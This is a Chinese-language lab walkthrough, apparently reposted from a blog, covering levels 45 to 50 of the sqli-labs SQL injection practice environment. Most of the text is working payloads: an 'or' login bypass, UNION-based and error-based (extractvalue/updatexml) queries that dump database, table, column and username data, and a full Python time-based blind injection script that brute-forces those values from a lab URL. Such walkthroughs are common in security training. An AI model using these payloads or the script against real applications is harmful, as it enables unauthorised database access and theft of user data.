45.

不会显示报错信息通过or 1验证

密码输入‘)or(‘1

登录成功

')union select 1,2,3 #

')union select 1,database(),3 #

')union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 #

')union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 #

')union select 1,(select group_concat(username) from security.users),3 #

46.

双引号报错

后面是order by使用and 1=1 是验证不了的

1 and(extractvalue(1,concat(0x5c,database())))
1 and(updatexml(1,concat(0x7e,database(),0x7e),1))

1 and(extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security'))))
1 and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))

1 and(extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))))
1 and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1))

1 and(extractvalue(1,concat(0x5c,(select group_concat(username) from security.users))))
1 and(updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1))

47.

1′失败

1‘ –+成功

1“成功 

1'and(extractvalue(1,concat(0x5c,database()))) --+
1'and(updatexml(1,concat(0x7e,database(),0x7e),1)) --+

1'and(extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security')))) --+
1'and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)) --+

1'and(extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))) --+
1'and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)) --+

48.

发现页面报错回显这里还是order by 无法使用union

使用延时注入

1 and if(substr(database(),1,1)='s',sleep(2),0)

脚本进行爆破

import requests,time

def database():
    database_name = ''
    charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
    while True:
        for char in charset:
            payload = f"1 and if(substr(database(),{len (database_name) +1},1)='{char}',sleep(2),0) --+"
            url = f'http://192.168.1.200:86/Less-48/?sort={payload}'
            start_time = time.time()
            rsp = requests.get(url)
            end_time = time.time()
            rsp.time = end_time - start_time
            if rsp.time >= 2:
                database_name += char
                print(f"数据库名称为:{database_name}")
                break
        else:
            break
    return database_name

datas = database()
print("最终数据库名称为:",datas)

1 and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1)='e',sleep(2),0) --+
def tablename():
    table_name =''
    charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
    while True:
        for char in charset:
            payload = f"1 and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),{len(table_name) +1},1)='{char}',sleep(2),0) --+"
            url = f'http://192.168.1.200:86/Less-48/?sort={payload}'
            start_time = time.time()
            rsp = requests.get(url)
            end_time = time.time()
            rsp.time = end_time - start_time
            if rsp.time >= 2:
                table_name += char
                print(f"表名称为:{table_name}")
                break
        else:
            break
    return table_name

tables =  tablename()
print("最终表名称为:",tables)

1 and if(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,1)='i',sleep(2),0) --+
def columnname():
    column_name = ''
    charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
    while True:
        for char in charset:
            payload = f"1 and if(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),{len(column_name) +1},1)='{char}',sleep(2),0) --+"
            url = f'http://192.168.1.200:86/Less-48/?sort={payload}'
            start_time = time.time()
            rsp = requests.get(url)
            end_time = time.time()
            rsp.time = end_time - start_time
            if rsp.time >= 2:
                column_name += char
                print(f"列名称为:{column_name}")
                break
        else:
            break
    return column_name

columns = columnname()
print("最终列名称为:",columns)

1 and if(substr((select username from security.users limit 1,1),1,1)='a',sleep(2),0) --+
def datas():
    data  = ''
    charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
    while True:
        for char in charset:
            payload = f"1 and if(substr((select username from security.users limit 1,1),{len(data) +1},1)='{char}',sleep(2),0) --+"
            url = f'http://192.168.1.200:86/Less-48/?sort={payload}'
            start_time = time.time()
            rsp = requests.get(url) 
            end_time = time.time()  
            rsp.time = end_time - start_time    
            if rsp.time >= 2:
                data += char
                print(f"数据为:{data}")
                break
        else:
            break
    return data
das = datas()
print("最终数据为:",das)
   

完整脚本

import requests,time

def database():
    database_name = ''
    charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
    while True:
        for char in charset:
            payload = f"1 and if(substr(database(),{len (database_name) +1},1)='{char}',sleep(2),0) --+"
            url = f'http://192.168.1.200:86/Less-48/?sort={payload}'
            start_time = time.time()
            rsp = requests.get(url)
            end_time = time.time()
            rsp.time = end_time - start_time
            if rsp.time >= 2:
                database_name += char
                print(f"数据库名称为:{database_name}")
                break
        else:
            break
    return database_name

datas = database()
print("最终数据库名称为:",datas)

         
def tablename():
    table_name =''
    charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
    while True:
        for char in charset:
            payload = f"1 and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),{len(table_name) +1},1)='{char}',sleep(2),0) --+"
            url = f'http://192.168.1.200:86/Less-48/?sort={payload}'
            start_time = time.time()
            rsp = requests.get(url)
            end_time = time.time()
            rsp.time = end_time - start_time
            if rsp.time >= 2:
                table_name += char
                print(f"表名称为:{table_name}")
                break
        else:
            break
    return table_name

tables =  tablename()
print("最终表名称为:",tables)

def columnname():
    column_name = ''
    charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
    while True:
        for char in charset:
            payload = f"1 and if(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),{len(column_name) +1},1)='{char}',sleep(2),0) --+"
            url = f'http://192.168.1.200:86/Less-48/?sort={payload}'
            start_time = time.time()
            rsp = requests.get(url)
            end_time = time.time()
            rsp.time = end_time - start_time
            if rsp.time >= 2:
                column_name += char
                print(f"列名称为:{column_name}")
                break
        else:
            break
    return column_name

columns = columnname()
print("最终列名称为:",columns)

def datas():
    data  = ''
    charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
    while True:
        for char in charset:
            payload = f"1 and if(substr((select username from security.users limit 1,1),{len(data) +1},1)='{char}',sleep(2),0) --+"
            url = f'http://192.168.1.200:86/Less-48/?sort={payload}'
            start_time = time.time()
            rsp = requests.get(url) 
            end_time = time.time()  
            rsp.time = end_time - start_time    
            if rsp.time >= 2:
                data += char
                print(f"数据为:{data}")
                break
        else:
            break
    return data
das = datas()
print("最终数据为:",das)
   

49.

和上面比多了’

50.

1 and(extractvalue(1,concat(0x5c,database())))
1 and(updatexml(1,concat(0x7e,database(),0x7e),1))

1 and(extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security'))))
1 and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))

1 and(extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))))
1 and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1))

1 and(extractvalue(1,concat(0x5c,(select group_concat(username) from security.users))))
1 and(updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1))

原文地址:https://blog.csdn.net/qq_61988806/article/details/134707411

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任

如若转载,请注明出处:http://www.7code.cn/show_38782.html

如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱:suwngjj01@126.com进行投诉反馈,一经查实,立即删除

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注